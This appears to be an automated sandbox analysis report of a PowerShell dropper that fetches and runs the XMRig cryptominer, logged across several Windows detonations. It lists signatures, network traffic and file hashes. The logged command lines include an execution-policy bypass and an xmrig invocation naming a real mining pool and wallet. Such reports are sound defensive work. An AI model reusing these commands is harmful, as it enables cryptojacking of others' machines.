memory/2344-129-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-130-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-131-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-132-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-133-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-134-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-135-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-136-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-137-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-138-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-139-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-140-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-141-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-142-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-143-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-144-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-145-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-146-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-147-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-148-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-149-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-150-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-151-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-152-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-153-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-154-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-155-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
memory/2344-156-0x00007FF6E02E0000-0x00007FF6E0F13000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:45
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1784s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4896 wrote to memory of 1800 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4896 wrote to memory of 1800 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.173.189.20.in-addr.arpa | udp |
Files
memory/4896-0-0x00007FFD9E693000-0x00007FFD9E695000-memory.dmp
memory/4896-1-0x000002A6F44A0000-0x000002A6F44C2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_heweg4l2.rnn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4896-11-0x00007FFD9E690000-0x00007FFD9F151000-memory.dmp
memory/4896-12-0x00007FFD9E690000-0x00007FFD9F151000-memory.dmp
memory/4896-14-0x00007FFD9E690000-0x00007FFD9F151000-memory.dmp
memory/4896-15-0x000002A6F4630000-0x000002A6F4642000-memory.dmp
memory/4896-16-0x000002A6F4490000-0x000002A6F449A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1800-47-0x0000022BBD810000-0x0000022BBD830000-memory.dmp
memory/1800-48-0x0000022C51790000-0x0000022C517B0000-memory.dmp
memory/1800-49-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-50-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-51-0x0000022C51DF0000-0x0000022C51E10000-memory.dmp
memory/1800-52-0x0000022C51E10000-0x0000022C51E30000-memory.dmp
memory/4896-53-0x00007FFD9E693000-0x00007FFD9E695000-memory.dmp
memory/4896-54-0x00007FFD9E690000-0x00007FFD9F151000-memory.dmp
memory/1800-55-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-56-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-57-0x0000022C51DF0000-0x0000022C51E10000-memory.dmp
memory/1800-58-0x0000022C51E10000-0x0000022C51E30000-memory.dmp
memory/1800-59-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-60-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-61-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-62-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-63-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-64-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-65-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-66-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-67-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-68-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-69-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-70-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-71-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-72-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-73-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-74-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-75-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-76-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-77-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-78-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-79-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-80-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-81-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-82-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-83-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-84-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-85-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-86-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-87-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-88-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-89-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-90-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-91-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-92-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-93-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-94-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-95-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-96-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-97-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-98-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-99-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-100-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-101-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-102-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-103-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-104-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-105-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-106-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-107-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-108-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-109-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-110-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-111-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-112-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-113-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-114-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-115-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-116-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
memory/1800-117-0x00007FF70C550000-0x00007FF70D183000-memory.dmp
Analysis: behavioral20
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:45
Platform
win11-20240508-en
Max time kernel
1789s
Max time network
1785s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2052 wrote to memory of 5072 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2052 wrote to memory of 5072 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| IE | 52.111.236.21:443 | tcp |
Files
memory/2052-0-0x00007FF949803000-0x00007FF949805000-memory.dmp
memory/2052-6-0x000002772AEF0000-0x000002772AF12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_k5fd03uv.10d.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2052-10-0x00007FF949800000-0x00007FF94A2C2000-memory.dmp
memory/2052-11-0x00007FF949800000-0x00007FF94A2C2000-memory.dmp
memory/2052-12-0x00007FF949800000-0x00007FF94A2C2000-memory.dmp
memory/2052-14-0x000002772B430000-0x000002772B442000-memory.dmp
memory/2052-15-0x000002772B410000-0x000002772B41A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/5072-46-0x0000019489580000-0x00000194895A0000-memory.dmp
memory/5072-47-0x000001948B090000-0x000001948B0B0000-memory.dmp
memory/5072-48-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/2052-49-0x00007FF949803000-0x00007FF949805000-memory.dmp
memory/2052-50-0x00007FF949800000-0x00007FF94A2C2000-memory.dmp
memory/5072-52-0x000001948B0D0000-0x000001948B0F0000-memory.dmp
memory/5072-51-0x000001948B0B0000-0x000001948B0D0000-memory.dmp
memory/5072-53-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/2052-54-0x00007FF949800000-0x00007FF94A2C2000-memory.dmp
memory/5072-55-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-56-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-58-0x000001948B0D0000-0x000001948B0F0000-memory.dmp
memory/5072-57-0x000001948B0B0000-0x000001948B0D0000-memory.dmp
memory/5072-59-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-60-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-61-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-62-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-63-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-64-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-65-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-66-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-67-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-68-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-69-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-70-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-71-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-72-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-73-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-74-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-75-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-76-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-77-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-78-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-79-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-80-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-81-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-82-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-83-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-84-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-85-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-86-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-87-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-88-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-89-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-90-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-91-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-92-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-93-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-94-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-95-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-96-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-97-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-98-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-99-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-100-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-101-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-102-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-103-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-104-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-105-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-106-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-107-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-108-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-109-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-110-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-111-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-112-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-113-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-114-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-115-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-116-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
memory/5072-117-0x00007FF70B600000-0x00007FF70C233000-memory.dmp
Analysis: behavioral23
Detonation Overview
Submitted
2024-05-26 13:33
Reported
2024-05-27 04:46
Platform
win10v2004-20240508-en
Max time kernel
1791s
Max time network
1757s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
